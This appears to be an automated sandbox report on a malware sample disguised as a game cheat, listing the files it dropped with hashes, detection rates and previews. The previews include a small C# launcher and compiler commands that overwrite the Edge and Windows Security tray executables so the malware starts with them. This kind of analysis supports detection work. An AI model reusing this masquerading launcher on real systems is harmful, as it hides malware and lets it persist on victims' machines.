                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3zivxmt.vc3.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ym4n1qac.fao.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zipggetc.b03.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsk050og.tzu.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwdmutxc.4l4.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.0.cs

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):395
                                                  Entropy (8bit):4.997424153875793
                                                  Encrypted:false
                                                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLa7vzaiFkD:JNVQIbSfhWLzIiFkMSfhmrnFkD
                                                  MD5:A909726567E5EFDAEEA07ADE29032606
                                                  SHA1:210F269C55F23EF3EA836E67865A51AEA6DFEB56
                                                  SHA-256:9BB93D40229031668A75B15A156CCCE4C8635E957291AE6A497D0ECDF9FC5CCD
                                                  SHA-512:D1D26057B4114B6ECF67338487CAC89B2FA914A5E44BF34C022B23CFE770869E76D5918CA0ADEA87E11D5D18A14FFA6B4642EE9F90FB5F55663905086A31EEFF
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\msportComWin\jnowHpJlZlXal.exe"); } catch { } }).Start();. }.}.

                                                  C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):269
                                                  Entropy (8bit):5.11292063872954
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23f5SWnn:Hu7L//TRRzscQlZh/n
                                                  MD5:032E53957AD0F21B227BFDB49F4D138C
                                                  SHA1:650DBF49D0663C78AD28D18F48E23E56C84FBF8B
                                                  SHA-256:73D94E5C67A20D3971D62A6DF7D87DB57E292423E37B0BCE1BCAA3600812562B
                                                  SHA-512:7FBADEC2029F09AB1E29A81A2992F4DA359E25D5A8B6538D2F8F6F45C864DC6ED2D4D3E11D2E8491000F8BB66FFEC48FF84DFD0F7C5DC5A93C1F33BD7287E51B
                                                  Malicious:true
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.0.cs"

                                                  C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.out

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):762
                                                  Entropy (8bit):5.235106981236256
                                                  Encrypted:false
                                                  SSDEEP:12:y6FoMI/u7L//TRRzscQlZh/uKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:y6FoMI/un/VRzstDsKax5DqBVKVrdFAw
                                                  MD5:22D2B08810760A9BB4C9D40F03C748D7
                                                  SHA1:0BF7F5750BC93EC41A6EDEEBCAE1F0D27F29D28B
                                                  SHA-256:FF9C06554C3551DEF40B45726C154C287A7CF3EEEBCE7A1D71B0BF2C52BC2E49
                                                  SHA-512:500B4B1F6CEC1252ED4365EF7E8910F710805D71C7526E83BD8AA9CA5F65699E1811905523931330A908A1F750E47A693189B245C94AF933993319F7C302CC8D
                                                  Malicious:false
                                                  Preview:.C:\msportComWin> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                  C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.0.cs

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):380
                                                  Entropy (8bit):4.953642471548714
                                                  Encrypted:false
                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2/pVv+saiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLaS
                                                  MD5:77DA26CDDBA7CD7B670047936A6DC5E1
                                                  SHA1:4B7EFE59E50DDFF8792D271ABE9488C49C25D087
                                                  SHA-256:3536797F0258EB4CC210C28CB6DE3CF20E390CF8017511625372DD865D3F0DCA
                                                  SHA-512:305AFD05E4FEF1B10DA64954CEFCBD587B1587777F84D610AB23E3A8B5AEFA2C279D7898B0767CD14B97E9B1B7B313D190B2BC5194999BA6C51A1C4AA481B3C1
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\msportComWin\jnowHpJlZlXal.exe"); } catch { } }).Start();. }.}.

                                                  C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):254
                                                  Entropy (8bit):5.096091034292349
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23f4VQn:Hu7L//TRq79cQlZwVQ
                                                  MD5:A53B01307FFD624AA239206F9C580CE5
                                                  SHA1:BBFB0D2F9AAEB95E69966602EF130DD750DDEC76
                                                  SHA-256:80A4684EB246E9DA933A426E072CD3602653B018D029575956F5163FB9276C62
                                                  SHA-512:4D255DB70A42D787996282C1B6567ACCDD1B11BC0B3A46F0D51CEF91456BEBB4DA301118BC3075828E1C8D85B75429D8B8509B4ED7F00B167A0676E2AA95CCAA
                                                  Malicious:false
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.0.cs"

                                                  C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.out

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):747
                                                  Entropy (8bit):5.247363193671764
                                                  Encrypted:false
                                                  SSDEEP:12:y6FoMI/u7L//TRq79cQlZwVFKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:y6FoMI/un/Vq79tDwvKax5DqBVKVrdFf
                                                  MD5:6A5B17506E184A34CD520B6C043839CF
                                                  SHA1:3D9CFD610F00E9AFAEC1F09519EAC121C1366158
                                                  SHA-256:24D7C4975C1C47DAE24996702B849BBA9DF902913E2B48E3930BE73DDB5FBD5F
                                                  SHA-512:51C2F05EF95DBCCBA458EB3CE4B98A0272C70DF839290E34E9DCF2E3B7DF7D9342A668F346F667614B627CD8417C9ECBD0FE3A790E7A95C55508D61E60E83788
                                                  Malicious:false
                                                  Preview:.C:\msportComWin> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                  C:\Users\user\Desktop\EcfIfcKE.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\MGoyPVal.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):5.645950918301459
                                                  Encrypted:false
                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\VjwnzPpT.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\VrgGeyQY.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\fSPDjruA.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\vyXTwjuX.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1224
                                                  Entropy (8bit):4.435108676655666
                                                  Encrypted:false
                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                  Malicious:false
                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.9320340249067818
                                                  Encrypted:false
                                                  SSDEEP:48:6qJ7PtcjM7Jt8Bs3FJsdcV4MKe27yVGvqBHeOulajfqXSfbNtm:1PlPc+Vx9Mtvk4cjRzNt
                                                  MD5:0E20396284067C3264EED6182AE27C8D
                                                  SHA1:5DF9AF8C8D4B1C5A083A92F202B2AE45562B9B1B
                                                  SHA-256:531977D821DB63274CA5382A6A5D2335549DC7B6ECE369BDF01FB64EF79D39D1
                                                  SHA-512:4ECCC341342AF4E2B615DED1C42FAAE617FECFF3667E11970D8B2C9794433E9E4D3A49B266248C46ED5242CC1AABBC24D94BFD5E70E15B54CB10421625FE474E
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                  C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):114
                                                  Entropy (8bit):5.213562304216253
                                                  Encrypted:false
                                                  SSDEEP:3:z0XPd1KH4CruLBLTxhPKnFfW58+XApKBHX6A3p01y8vjTc:wXP3j+ExTOfW6+XApKB3LpUy8vjA
                                                  MD5:EC4930435249E865EC0910B90CE34010
                                                  SHA1:E00242BA6B91ABE0291EE6C003C7CDA9F280A20C
                                                  SHA-256:AECACCC8288E076EFA186171EAB1CE946B8C0438E607F00A442B04E1E080DFBB
                                                  SHA-512:F1BB3A20BD279B62B94349D253B64A4BB9227FA214785E265B5F5457A552BDDB141FAEA48109ED80A6D77F34C8BA68FD2911DAA178893DAEE52259E89A6B80AA
                                                  Malicious:false
                                                  Preview:%LSfhCeWTlxP%%apyNizugZHqajNf%..%PndaGeSTDjoeg%"C:\msportComWin/BridgePortsurrogateserverref.exe"%sJkBzDAYJHYivXD%

                                                  C:\msportComWin\7ebef5d49c4292

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with very long lines (708), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):708
                                                  Entropy (8bit):5.886236415284474
                                                  Encrypted:false
                                                  SSDEEP:12:wXMVWBntIN46vytDRdgbfIzyhyjKtjf+dCJDXcMv8X4NdpBSr3JqSc8oT:ZVOtgFvIDUbfIz928k8XAdjO3JqSc8Q
                                                  MD5:8EC242BF9C281FBC36A3977524AFAB87
                                                  SHA1:DAF663C31B82E4DB8162C26124153A37E1A1CFFD
                                                  SHA-256:CAABEFEA5C751A1ECF81734D2B7FD62F3B3ABE5CB3ECC755E71D58EA9992604A
                                                  SHA-512:91FC3DB79B11291B7AB5A3460B77CAB3A85545C00C795B51D7A36542EAF999E7D107D09BD8A5494DFD503E9FCB76DAEC10039680616F9C4D04708D93CCB61F3B
                                                  Malicious:false
